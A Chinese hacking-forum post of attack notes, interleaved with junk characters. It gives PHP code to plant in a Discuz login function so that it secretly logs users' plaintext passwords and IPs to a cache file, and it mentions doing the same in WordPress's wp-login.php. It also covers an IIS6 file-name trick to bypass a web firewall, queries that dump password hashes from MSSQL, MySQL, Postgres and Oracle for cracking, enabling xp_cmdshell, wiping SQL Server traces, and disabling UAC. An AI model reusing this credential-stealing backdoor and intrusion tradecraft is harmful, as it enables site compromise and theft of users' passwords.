8 @$ k H' F: z/ W s' ]当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。% [2 P/ c! f3 |0 q' P- {( K; ]
就是搜索case ‘login’
& i) x$ ?6 J' D) C) Y在它下面直接插入即可,记录的密码生成在pwd.txt中,
+ Q- a0 _4 [' M* I8 c其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录+ b+ U2 {) S) r
利用II6文件解析漏洞绕过安全狗代码:# q6 m6 B' w& F3 N( N, _
;antian365.asp;antian365.jpg/ @' A. A1 s) ~
{ }0 s5 M) f5 e g K
各种类型数据库抓HASH破解最高权限密码!
$ \# A, h; d/ D% \ H1.sql server2000$ r0 J9 L2 b5 c7 B6 }! \5 U
SELECT password from master.dbo.sysxlogins where name='sa'; z! \$ E4 T9 U7 e2 c. p0 l+ K0 w5 v
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341; x6 ?# L' Z1 w" ]2 l
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A+ J, ~% C( v: r, \- ]. W
- m; x* [# d6 [- p0×0100- constant header) c$ W }, }" ^% F% U( \
34767D5C- salt9 k; p+ B. ^( ?, ] j
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
, Q4 \' B, L2 u1 x0 a8 ~2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash8 J8 b9 ]" l, O: R: Q R
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash. ?7 }4 A9 u B$ E
SQL server 2005:-
" |& \8 \6 O; o3 I, `* B- jSELECT password_hash FROM sys.sql_logins where name='sa'
6 o, `9 k1 C6 v% l0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
/ Q; L) I6 V) U# Y; L% T0 H) [0×0100- constant header" V9 Y1 c- w5 p2 l# }
993BF231-salt
+ n$ }* H: X6 L, b: [5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
- |1 ]# F4 ?& a* K) c8 V5 A4 q9 {crack case sensitive hash in cain, try brute force and dictionary based attacks.* [& G1 n& H3 J7 c |! m
0 o$ K O' a# d( b1 aupdate:- following bernardo’s comments:-9 ~ m* t$ @& u! g3 Z1 s, y2 P
use function fn_varbintohexstr() to cast password in a hex string.
# K& \5 E$ j7 ^5 [* P! ae.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins5 K" Q V0 H' R+ Z( q: Z- `, p$ M
+ S- ?+ g2 K6 z0 n p2 I @* Z
MYSQL:-/ q3 x# b2 n$ p
! Y% {0 @! Z D& k5 n' v- OIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
2 t: ]/ W3 G0 ?6 f) x0 d) F* q% S$ P% N. U# Q0 x& d
*mysql < 4.16 q( C5 h4 J. s3 n* c6 X
5 H" E6 W8 o r3 Jmysql> SELECT PASSWORD(‘mypass’);
) Z# x$ v4 K3 v% x# C/ g+——————–+
5 M( s7 x2 a6 I( W) A( n/ @| PASSWORD(‘mypass’) |' \; K- f6 t! t' j0 y6 M
+——————–+
9 l" |; B; ? q# [' K| 6f8c114b58f2ce9e |2 b6 H0 g" _8 _ e7 x5 @5 z; C" ]
+——————–+/ R; g* |0 P' w8 \9 Y5 J" j
$ _/ L4 w! b% _' l*mysql >=4.1) R" ^- p: k. G& W0 O) ?" d
- G4 z! D; J. f% i7 d: ^* Bmysql> SELECT PASSWORD(‘mypass’);( ? h# v# R% u
+——————————————-+* r8 d6 z0 R" A+ l- s
| PASSWORD(‘mypass’) |2 m1 l9 W+ d" b$ Q2 w8 \6 ^4 @
+——————————————-+
0 N8 o/ i0 F! l" r| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
! n. ^; `! n8 j8 _6 r+——————————————-+
" L, W2 ]# E$ u+ f. e7 o) M4 w" d9 Y) l7 p: E9 Y9 a
Select user, password from mysql.user2 t! i o/ j* @# b
The hashes can be cracked in ‘cain and abel’
$ j! u5 d+ K1 [0 Z2 V) l+ R+ Z# h/ \* I
Postgres:-
5 }5 p- B( ]0 u. A8 G' u2 lPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)6 e; x) x6 z1 Z8 m8 _$ C4 k
select usename, passwd from pg_shadow;
0 B) y4 g" B I- T2 D. G' D2 ]usename | passwd% \2 ^' x- j* ^6 T% T8 a
——————+————————————-
0 Z/ h/ S9 D ^) Z9 j. @testuser | md5fabb6d7172aadfda4753bf0507ed4396
) x( H! J( q7 w" u" \( D. huse mdcrack to crack these hashes:-, [1 z1 p9 k* ]6 r) L( y2 D6 ~- @
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
/ i: u5 o$ u5 V6 ?# o9 |, V
% ?) M4 P. k" T \Oracle:-
6 S4 W5 O/ ~" M/ A* Eselect name, password, spare4 from sys.user$! K) M7 e; }: v$ s* i" L
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g: j0 S' t) {' U1 o0 h% a- V2 I, I
More on Oracle later, i am a bit bored….
" d- n& o$ F3 a+ f4 V5 z; W# V2 f% F& D$ _
) q. N* t# q" G: _# `
在sql server2005/2008中开启xp_cmdshell$ f2 ?* O) ` \" y$ B* E
-- To allow advanced options to be changed./ f i) @( a; w7 T
EXEC sp_configure 'show advanced options', 16 l; C" N* F$ B5 \7 g H
GO
4 q& T7 D2 y: g* ]- O-- To update the currently configured value for advanced options.6 S2 | C* b6 f% E1 v5 x8 l
RECONFIGURE- D; r Y/ }: o, q& j2 L
GO* | J/ X; y+ b8 I: I1 q4 p$ V1 g
-- To enable the feature.: m0 r) w5 y' O3 h5 T
EXEC sp_configure 'xp_cmdshell', 1$ o! p( e8 y; Y4 M4 v4 L
GO; \7 L$ J- V! o' P5 Q
-- To update the currently configured value for this feature.
! x! \* ?+ S9 }6 C$ wRECONFIGURE
1 |' R0 q6 i) j* G& vGO1 ]& v' f$ E, E2 K t
SQL 2008 server日志清除,在清楚前一定要备份。
0 x) ^! m% E9 z3 I1 ~如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:& ~2 u/ A7 |( g4 @
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
4 i2 D& T% d( c- ?- p ^9 S2 H) Q! g' ?9 X8 c' j
对于SQL Server 2008以前的版本:. U1 n& ?* @ u
SQL Server 2005:
. f; y. I, x- p2 D* M& X删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat) |8 B7 n" A' l4 x+ p U b
SQL Server 2000:
! L: m: V+ N) }( Q' A# h1 B清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
. W% [' @5 d. V" S$ t, D/ D
( {* k9 b2 x! I+ e3 `1 {2 }- e本帖最后由 simeon 于 2013-1-3 09:51 编辑2 M, W9 l0 O3 h7 X. o! Y
' v7 | f+ T, {. x* Q3 u1 c* U! n" \+ D' j# q
windows 2008 文件权限修改) e6 I# y; R _$ l ^1 p3 e
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx, B1 F& ]" `, p5 }; }
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98& C/ B8 W& p: P; M. I
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
. O! y+ {2 q: E$ u C# Q* v
8 \* A$ K; Y0 T& p: D+ @3 dWindows Registry Editor Version 5.000 @$ \1 r* n7 G7 \8 U9 V
[HKEY_CLASSES_ROOT\*\shell\runas]9 q B' r: _ ]0 Y7 y
@="管理员取得所有权"# c, d) U- r y" W9 A) U
"NoWorkingDirectory"=""
' A( [! O8 E5 |: }[HKEY_CLASSES_ROOT\*\shell\runas\command]
: y) s2 K. x6 I- u% F$ }@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"5 d D# h I. A$ s7 {
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"7 B% u) B, q5 R2 ]6 Q) }) [. t
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
: V7 h% M* p( S$ z; h2 t@="管理员取得所有权"
8 W, Y- a# ~, w0 ^) F/ j) @"NoWorkingDirectory"=""
/ Q0 b M8 M/ D. a[HKEY_CLASSES_ROOT\exefile\shell\runas2\command] l$ w2 ~# p' h3 X% s
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
% v# _' ?1 Y( k"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"4 E% ?. p# P" d: {1 J- {. ~
4 g% h( m) B& g[HKEY_CLASSES_ROOT\Directory\shell\runas]# U: i3 E+ ?1 Q6 @. Z
@="管理员取得所有权"
$ m8 E) [( c' k* y"NoWorkingDirectory"=""3 z3 H( Z: ?- V4 v) y0 X
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]+ o6 p% z2 l- I3 [# E+ M; b& |
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
. u- Y# g# P2 s' A2 D6 X"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"; h( l2 q, g+ x0 M0 a. ~1 g
# l! B) Q* a8 a/ Y
0 m6 ?* n9 `' U; }( f* v) Wwin7右键“管理员取得所有权”.reg导入! O* w8 I4 p4 @* I" A
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,; Z( Q/ [# M( v+ O( U) J
1、C:\Windows这个路径的“notepad.exe”不需要替换
' |. g: ?8 q; h' h' h- J% d2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
O& N% p. |/ l: x2 L F3、四个“notepad.exe.mui”不要管
: N* \) l, ~% X2 K1 p" s* P4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
6 f( V3 w. ^: E m, S- KC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”5 U7 t% c% h6 m# E7 U/ {4 ?$ x! h
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,1 H2 a2 ]+ R* B G: _! X, g9 W
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
o! _, \' i% r @/ Mwindows 2008中关闭安全策略: 6 E- N- X$ }% h# ]; e) g% _
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, ^" D7 U* c# I3 [+ k- n
修改uc_client目录下的client.php 在
( j& ]6 |6 F) l2 [/ i1 u8 w; ~: Gfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {1 k3 a! ~ @* O- k7 ^
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
1 R: |+ }% P; y4 H, c你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw( n; W' l6 J& [+ e+ s
if(getenv('HTTP_CLIENT_IP')) {
# G: o' X X4 ~. ~* V$onlineip = getenv('HTTP_CLIENT_IP');# [( B% `# q6 I8 q1 a( X5 k
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
/ s5 }9 w# Y/ J/ J1 e6 l2 }$onlineip = getenv('HTTP_X_FORWARDED_FOR');
7 s, G$ n0 @ I9 y6 ]+ ]* ^, J; P} elseif(getenv('REMOTE_ADDR')) {3 g' r' \; s; K6 {( M8 t1 t( @
$onlineip = getenv('REMOTE_ADDR');: s# i" l. n, J; R: G4 f& H
} else {! L$ U2 k; X S- f% O
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
, m/ L# b5 Q* b}/ E# K+ J4 n, n" n
$showtime=date("Y-m-d H:i:s");% u0 o& J$ F" G/ p9 y
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
7 D' [2 m; j3 X5 q $handle=fopen('./data/cache/csslog.php','a+');
- D0 a% e9 S" p# {4 w: M& A, W $write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对